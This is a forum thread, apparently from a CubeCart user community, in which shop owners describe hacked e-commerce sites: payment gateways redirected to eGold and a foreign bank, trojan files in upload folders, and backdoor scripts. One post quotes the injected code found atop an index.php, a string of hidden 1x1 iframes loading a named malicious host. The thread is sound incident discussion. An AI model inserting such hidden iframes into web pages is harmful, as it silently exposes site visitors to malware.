Site hacked again in 2 days

[sleepyfrog]

My client found out on Thursday that someone had hacked into his site and changed the recipient email for Paypal.

Investigating I found that a new folder had been created in images/uploads/ and tojan files uploaded.

I deleted the files, changed all the passwords and set the images and upload folders to 755.

Today the hacker has been back and changed the payment processing to eGold.

I have changed back, and deleted all the payment options other than Paypal. I've been onto Cubecart support who say to set permissions of the images folder to 644 - however, when I do the images are no longer shown on the website. The lowest permission that will work is 755.

the hosting company say that the uploads script, which is used in the admin area to upload the photos, is the probably security leak and needs to be disabled as soon as possible.

Can someone tell me where the files are for this feature and how I can remove them?

As the hacker has got into this site very easily you should all be warned to check your own images/upload folder regularly.

[roban]

I just love it when hosts shift the responsibility for their lack of security to Cube Cart. Who is your host?

[sleepyfrog]

I just love it when hosts shift the responsibility for their lack of security to Cube Cart. Who is your host?

The site is hosted by Pipex/Webfusion.

My concern is that they do not seem to be logging in through the admin area with a password, so how else could they be changing the details in the Gateway area?

They managed to disable Paypal, enable eGold with their details and add the by post option, asking for bank transfers to an asian bank.

I just want a straight answer from someone on how they can still be getting in so I can fix it - rather than everyone blaming everyone else.

[Guest Sibby]

I just love it when hosts shift the responsibility for their lack of security to Cube Cart. Who is your host?

Oh I don't know. Some guys were going on about CC and security last night, I told them I had the patch installed and they were going on about something else. Kind of worrying, though it could just be trash talk..

[Guest]

I would check thru all your folders and make sure there are no other files there that shouldn't be. Hackers sometimes upload hidden files (make sure your "show hidden files" option is on btw) that allow them to keep get access to your account.

Also I'd change your database passwords - I believe he could have made these changes by hacking into your database.

I also agree that it sounds like your hosts aren't very secure either. I had hacking problems on a previous host, but never on my current one. I think it's a matter of a more experienced host as well as exploits.

[roban]

I find folders added to my includes folder all the time. If you run an ecommerce site and use shared hosting you are asking for trouble.

[Guest Pete_bolton]

I find folders added to my includes folder all the time. If you run an ecommerce site and use shared hosting you are asking for trouble.

I find this statement worrying, can you explain, i use shared hosting through vodahost.

Would you recomend my own server or would having my own IP address on my shared hhosting help?

Any comments welcome...

[Guest luke_a]

to the OP, what version of CC are you running?

[Guest Arild]

With shared hosting anyone on thet server has easy access to your files, unless it is set up correctly and secure with Open_basedir, rootjail.....

It it is poorly set up then even if you keep your site up to date and secure others may not. That mean other open a backdoor to the server and may walk through all files on the server accessible to the webserver.

I find folders added to my includes folder all the time. If you run an ecommerce site and use shared hosting you are asking for trouble.

I find this statement worrying, can you explain, i use shared hosting through vodahost.

Would you recomend my own server or would having my own IP address on my shared hhosting help?

Any comments welcome...

[Guest]

My site was hacked too.... I was using Version 3.04 but have since upgraded to the latest version.

I found 2 scripts in the includes/boxes folder that allowed the hacker to login and do anything they wanted to to any of the files and folders.

I have since found that they have yet again attacked the site and left the script below in the first line of the index.php file:

<iframe width=1 height=1 border=0 frameborder=0 src="http://traff.step57.info/mrx/"></iframe><iframe width=1 height=1 border=0 frameborder=0 src="http://traff.step57.info/mrx/"></iframe><iframe width=1 height=1 border=0 frameborder=0 src="http://traff.step57.info/mrx/"></iframe><iframe width=1 height=1 border=0 frameborder=0 src="http://traff.step57.info/mrx/"></iframe><iframe width=1 height=1 border=0 frameborder=0 src="http://traff.step57.info/mrx/"></iframe><!--iframe width=1 height=1 border=0 frameborder=0 src="http://traff.step57.info/mrx/"></iframe--><!--iframe width=1 height=1 border=0 frameborder=0 src="http://traff.step57.info/mrx/"></iframe-->

[Guest mediajunk]

If you put traff.step57.info/mrx/ into google, it idenitifies it straight away as malicious site. Its seem to have hit a lot of ecommerce sites (like zen cart + oscommerce) and blogs.

step57.info contains scripts on cpanel exploits, so that rules out CC being unsecure im guessing.

While searching for it, i found that someone in the oscommerce community has made a fix for it. I downloaded it, but im not sure if its a fix for cpanel or oscommerce, but here it is anyway: Step57 Hack Fix

[Guest midwest]

HMMM,

Me finds this all very interesting. Especially since my host uses cpanel and they just recently moved me to a different server.

Do believe a call is in order.

Also I believe CC needs to investigate immediatly, regardless who's door it is.

midwest ;)